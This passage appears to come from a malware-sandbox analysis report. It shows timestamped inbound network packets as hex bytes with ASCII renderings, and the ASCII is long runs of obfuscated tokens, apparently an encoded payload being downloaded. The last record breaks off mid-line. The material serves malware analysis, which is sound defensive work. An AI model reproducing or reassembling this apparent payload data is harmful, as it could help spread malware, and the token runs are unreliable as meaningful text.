x KE x Kk x OxE x kx x Yt x YK x Qx x OxE x OOk x Kt x Qk x RQ x OOO x YK x Kt x OoO x OO
2021-10-29 18:50:19 UTC	2748	IN	Data Raw: 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 45 20 78 20 4f 4f 4b 20 78 20 4f 78 59 20 78 20 6b 4f 20 78 20 74 52 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 59 74 20 78 20 74 6f 20 78 20 6b 78 20 78 20 4b 74 20 78 20 59 74 20 78 20 6b 6b 20 78 20 4f 78 4f 20 78 20 59 52 20 78 20 6b 78 20 78 20 4b 74 20 78 20 6b 52 20 78 20 59 4f 20 78 20 4f 4f 6b 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 78 78 20 78 20 59 59 20 78 20 4f 4f 51 20 78 20 4b 74 20 78 20 59 74 20 78 20 6b 6b 20 78 20 4f 78 4f 20 78 20 59 52 20 78 20 6b 78 20 78 20 4b 74 20 78 20 6b 52 20 78 20 59 4f 20 78 20 4f 4f 6b 20 78 20 Data Ascii: x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x KE x OOK x OxY x kO x tR x Kt x Ooo x Yt x to x kx x Kt x Yt x kk x OxO x YR x kx x Kt x kR x YO x OOk x Rk x Kt x KQ x Oxx x YY x OOQ x Kt x Yt x kk x OxO x YR x kx x Kt x kR x YO x OOk x
2021-10-29 18:50:19 UTC	2753	IN	Data Raw: 4f 20 78 20 6b 51 20 78 20 6b 59 20 78 20 6b 74 20 78 20 4b 74 20 78 20 59 4b 20 78 20 74 4f 20 78 20 52 74 20 78 20 52 52 20 78 20 4f 4f 6b 20 78 20 59 74 20 78 20 4f 4f 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 74 52 20 78 20 4f 78 4b 20 78 20 74 4b 20 78 20 4f 78 59 20 78 20 74 45 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 4f 59 20 78 20 4f 4f 51 20 78 20 4f 4f 4b 20 78 20 4f 78 4b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 4b 74 20 78 20 4b 74 20 78 Data Ascii: O x kQ x kY x kt x Kt x YK x tO x Rt x RR x OOk x Yt x OOO x kY x RY x tR x OxK x tK x OxY x tE x RY x kx x OOY x OOQ x OOK x OxK x OOk x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x OOK x Kt x KE x OOk x Kt x Yt x Kt x Kt x Ooo x Kt x Kt x
2021-10-29 18:50:19 UTC	2757	IN	Data Raw: 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f Data Ascii: Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x Yt x Kt x Kt x Ooo x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x O
2021-10-29 18:50:19 UTC	2761	IN	Data Raw: 20 78 20 4b 74 20 78 20 52 59 20 78 20 59 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4f 4f 52 20 78 20 74 6b 20 78 20 74 4b 20 78 20 74 6f 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 6b 20 78 20 4f 78 4f 20 78 20 6b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 52 59 20 78 20 59 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4f 4f 51 20 78 20 74 52 20 78 20 4f 4f 6f 20 78 20 74 52 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 74 20 78 20 51 74 20 78 20 74 51 20 78 20 4b 74 20 78 20 4b 74 20 78 20 52 59 20 78 20 4f 4f 4b 20 78 20 4f 78 74 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 4f 4f 52 20 78 20 74 4b 20 78 20 4f 4f 4f 20 78 20 59 4f 20 78 20 4b 74 20 78 20 59 59 20 78 20 6b 45 20 78 20 74 4f 20 78 20 74 52 20 78 20 4b 74 20 78 Data Ascii: x Kt x RY x YO x Oxk x OOk x Kt x OOR x tk x tK x to x Kt x YR x Rk x OxO x kt x Kt x Kt x RY x YO x Oxk x OOk x Kt x OOQ x tR x OOo x tR x Kt x YR x Rt x Qt x tQ x Kt x Kt x RY x OOK x Oxt x Oxo x Kt x OOR x tK x OOO x YO x Kt x YY x kE x tO x tR x Kt x
2021-10-29 18:50:19 UTC	2765	IN	Data Raw: 20 78 20 59 4f 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 4b 20 78 20 4f 4f 74 20 78 20 59 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 6b 78 20 78 20 4b 6b 20 78 20 51 51 20 78 20 59 59 20 78 20 4b 74 20 78 20 51 78 20 78 20 52 51 20 78 20 4b 6b 20 78 20 74 45 20 78 20 59 74 20 78 20 4f 78 52 20 78 20 4f 4f 59 20 78 20 51 78 20 78 20 74 6f 20 78 20 59 74 20 78 20 74 74 20 78 20 52 6b 20 78 20 52 59 20 78 20 6b 4f 20 78 20 74 78 20 78 20 6b 52 20 78 20 4f 78 74 20 78 20 4b 51 20 78 20 6b 45 20 78 20 52 59 20 78 20 4b 74 20 78 20 59 45 20 78 20 74 4b 20 78 20 6b 4b 20 78 20 4f 78 45 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 74 78 20 78 20 4f 78 74 20 78 20 59 45 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4f 4f 51 20 78 20 51 6b 20 78 20 59 78 20 78 20 6b 78 20 Data Ascii: x YO x Kt x KE x OOK x OOt x Yt x Kt x Kt x kx x Kk x QQ x YY x Kt x Qx x RQ x Kk x tE x Yt x OxR x OOY x Qx x to x Yt x tt x Rk x RY x kO x tx x kR x Oxt x KQ x kE x RY x Kt x YE x tK x kK x OxE x Oxo x Kt x tx x Oxt x YE x kx x Kt x OOQ x Qk x Yx x kx
2021-10-29 18:50:19 UTC	2769	IN	Data Raw: 45 20 78 20 4f 6f 6f 20 78 20 51 51 20 78 20 59 6f 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4f 4f 59 20 78 20 59 78 20 78 20 4b 45 20 78 20 52 6b 20 78 20 4b 74 20 78 20 59 59 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 45 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 6f 6f 20 78 20 51 6b 20 78 20 59 6f 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4f 4f 59 20 78 20 59 78 20 78 20 4b 45 20 78 20 52 6b 20 78 20 4b 74 20 78 20 59 59 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 6f 6f 20 78 20 51 6b 20 78 20 59 6f 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4f 4f 59 20 78 20 59 78 20 78 20 4b 45 20 78 20 52 6b 20 78 20 4b 74 20 78 20 59 59 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 45 20 78 20 4b 74 20 78 20 4b 45 20 78 Data Ascii: E x Ooo x QQ x Yo x kx x Kt x OOY x Yx x KE x Rk x Kt x YY x tk x OOk x OxE x Kt x KE x Ooo x Qk x Yo x kx x Kt x OOY x Yx x KE x Rk x Kt x YY x tk x OOk x Oxo x Kt x KE x Ooo x Qk x Yo x kx x Kt x OOY x Yx x KE x Rk x Kt x YY x tk x OOk x OxE x Kt x KE x
2021-10-29 18:50:19 UTC	2773	IN	Data Raw: 20 78 20 74 74 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 59 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 6b 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 74 4b 20 78 20 4f 4f 78 20 78 20 52 74 20 78 20 6b 51 20 78 20 52 59 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 51 51 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 45 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 Data Ascii: x tt x RY x Oxx x RY x RR x OoO x RY x tO x OOQ x RY x tY x OOQ x RR x kK x RY x RY x RY x RY x RY x RY x RR x tK x OOx x Rt x kQ x RY x kY x RY x RR x OoO x RY x tO x YR x RY x QQ x RY x RR x Oxk x RY x to x tE x RY x Oxx x RY x RR x OOo x RY x tO x kY
2021-10-29 18:50:19 UTC	2777	IN	Data Raw: 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 4b 20 78 20 52 59 20 78 20 52 51 20 78 20 74 74 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 59 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 51 20 78 20 4f 4f 78 20 78 20 52 51 20 78 20 52 51 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4b 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 Data Ascii: x OOQ x RY x tK x RY x RQ x tt x RY x Oxx x RY x RR x OoO x RY x tO x OOQ x RY x tY x OOQ x RR x kO x RY x tO x OOQ x RY x Oxx x kO x RR x Ooo x RY x RY x RY x RY x RY x RY x RR x kQ x OOx x RQ x RQ x RY x Oxx x kO x RR x Kk x RY x tO x YR x RY x tE x RY
2021-10-29 18:50:19 UTC	2780	IN	Data Raw: 4f 78 20 78 20 52 51 20 78 20 74 74 20 78 20 52 59 20 78 20 51 74 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 4f 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 4f 52 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 51 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 74 74 20 78 20 4f 4f 78 20 78 Data Ascii: Ox x RQ x tt x RY x Qt x RY x RR x OOk x RY x tO x YR x RY x QQ x OOQ x RR x Oxk x RY x Rt x RY x RY x kO x OOQ x RR x OOk x RY x tO x OOQ x RY x Oxx x kO x RR x OOR x RY x Rt x kQ x RY x Qk x OxE x RR x Ooo x RY x RY x RY x RY x RY x RY x RR x tt x OOx x
2021-10-29 18:50:19 UTC	2785	IN	Data Raw: 20 78 20 52 59 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 4f 20 78 20 52 59 20 78 20 6b 78 20 78 20 59 52 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 52 6b 20 78 20 4f 4f 4b 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 78 45 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 6b 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 51 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 4f 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 51 6b Data Ascii: x RY x Oxk x RY x RY x RY x RY x RY x RY x RR x OOQ x RY x tO x RY x kx x YR x RY x Rt x kO x Rk x OOK x RY x Kt x Kt x Kt x OxE x OxE x RR x kY x RY x tO x OxE x RY x Qx x kO x RY x OxE x RY x tO x kQ x RY x Qk x OOQ x RR x OOY x RY x tO x OOQ x RY x Qk
2021-10-29 18:50:19 UTC	2789	IN	Data Raw: 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 6b 74 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 4b 20 78 20 52 59 20 78 20 74 51 20 78 20 59 52 20 78 20 52 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 6f 20 78 20 74 45 20 78 20 52 59 20 78 20 6b 4f 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 4f 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 4b 6b 20 78 20 52 59 20 78 20 51 6b 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 78 4b 20 78 20 52 59 20 78 20 74 4f 20 78 Data Ascii: RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x Oxk x RY x to x RY x RR x OOQ x RY x kt x OOQ x RY x tK x RY x tQ x YR x Rk x RY x RY x Rk x Kt x Kt x Yo x tE x RY x kO x OOQ x RR x OOk x RY x tO x Kk x RY x Qk x kO x RR x OxK x RY x tO x
2021-10-29 18:50:19 UTC	2793	IN	Data Raw: 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 74 20 78 20 52 52 20 78 20 6b 59 20 78 20 74 4f 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 6b 74 20 78 20 52 59 20 78 20 52 52 20 78 20 74 52 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 4b 45 20 78 20 4f 78 45 20 78 20 74 74 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 78 45 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 Data Ascii: x RY x RY x RY x RY x RY x RY x RY x OxE x RY x Rt x RR x kY x tO x OxE x RR x kt x RY x RR x tR x RY x RY x OOQ x RY x KE x OxE x tt x RY x RY x kx x Kt x Kt x OxE x kO x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
2021-10-29 18:50:19 UTC	2797	IN	Data Raw: 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 74 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 51 78 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4b 51 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 51 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 51 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4b 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 6f 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 74 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 Data Ascii: x RY x OxE x RY x to x kO x RY x Qt x RY x RR x Oxk x RY x Rt x RY x RY x Qx x OxE x RR x KQ x RY x tO x OOQ x RY x Qk x RY x RY x OxE x RY x to x RY x RY x kQ x kO x RR x Kk x RY x tO x OxE x RY x tE x RY x RR x OOo x RY x to x tt x RY x tE x RY x RR x
2021-10-29 18:50:19 UTC	2801	IN	Data Raw: 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 51 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 4f 78 4b 20 78 20 6b 59 20 78 20 74 59 20 78 20 74 74 20 78 20 52 59 20 78 20 4f 6f 4f 20 78 20 6b 4f 20 78 20 52 74 20 78 20 4b 6b 20 78 20 52 59 20 78 20 74 52 20 78 20 6b 51 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 51 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 4b 74 20 78 Data Ascii: tO x YR x RY x Qx x RY x RR x Oxk x RY x Rk x OOO x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x OOQ x RY x OxK x kY x tY x tt x RY x OoO x kO x Rt x Kk x RY x tR x kQ x RY x RR x OOQ x kO x RY x RY x kx x Kt x
2021-10-29 18:50:19 UTC	2805	IN	Data Raw: 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 4f 74 20 78 20 52 59 20 78 20 74 4f 20 78 20 4b 6b 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 4f 74 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4b 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 4f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 6f 20 78 20 52 59 20 78 20 51 78 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 Data Ascii: x Qk x OOQ x RR x OOt x RY x tO x Kk x RY x Qx x kO x RR x OOt x RY x to x kO x RY x tE x RY x RR x kK x RY x to x kO x RY x QQ x OxE x RR x OOo x RY x tO x Yo x RY x Qx x OOQ x RR x Ooo x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x R
2021-10-29 18:50:19 UTC	2809	IN	Data Raw: 59 52 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 45 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 78 52 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 4b 20 78 20 6b 4f 20 78 20 52 52 20 78 20 6b 4b 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 Data Ascii: YR x RY x Qk x OOQ x RR x Ooo x RY x tO x kY x RY x tE x RY x RR x kO x RY x to x tE x RY x Qk x OOQ x RR x OxR x RY x tO x kY x RY x QQ x OOQ x RR x Ooo x RY x RY x RY x RY x Rt x RY x Rt x kO x RY x kO x RY x RR x kK x kO x RR x kK x RY x Rt x RY x RY x
2021-10-29 18:50:19 UTC	2812	IN	Data Raw: 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4f 78 6f 20 78 20 52 59 20 78 20 74 78 20 78 20 52 51 20 78 20 52 59 20 78 20 74 74 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 51 20 78 20 52 59 20 78 20 74 51 20 78 20 59 52 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 51 20 78 20 52 59 20 78 20 6b 45 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 Data Ascii: x RY x RY x Rt x Oxo x RY x tx x RQ x RY x tt x OxE x RY x tQ x RY x tQ x YR x Rk x Kt x Kt x KE x RY x RY x Rt x kQ x RY x kE x RY x RR x OOo x RY x tO x kO x RY x Qx x kO x RY x RY x RY x RY x RY x RY x RY x RY x RY x RR x kY x RY x RY x RY x RY x RY x
2021-10-29 18:50:19 UTC	2817	IN	Data Raw: 78 20 74 45 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 78 4b 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 51 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 59 45 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 4f 78 20 78 20 52 59 20 78 20 52 52 20 78 20 74 74 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 Data Ascii: x tE x RY x Qx x kO x RR x OxK x RY x to x kO x RY x Qx x kO x RR x Oxt x RY x Rt x RY x RY x kQ x OxE x RR x YE x RY x Rt x RY x RY x Oxx x kO x RR x Ooo x RY x tO x Oxt x RY x Qk x OxE x RR x OOx x RY x RR x tt x RY x kY x OOQ x RR x Oxk x RY x tO x OOQ
2021-10-29 18:50:19 UTC	2821	IN	Data Raw: 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 52 51 20 78 20 52 59 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 74 78 20 78 20 52 59 20 78 20 74 6f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 51 51 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 Data Ascii: x tO x kY x RY x Qx x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RR x RQ x RY x kO x kO x RR x Oxt x RY x tO x kO x RY x tE x RY x RR x tx x RY x to x OxE x RY x QQ x RY x RR x OOY x RY x tO x YR x
2021-10-29 18:50:19 UTC	2825	IN	Data Raw: 45 20 78 20 52 52 20 78 20 4f 4f 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 51 74 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 45 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 51 78 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 4f 78 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 52 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 6f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 51 20 78 20 4f 4f 51 20 78 20 52 Data Ascii: E x RR x OOk x RY x to x kO x RY x 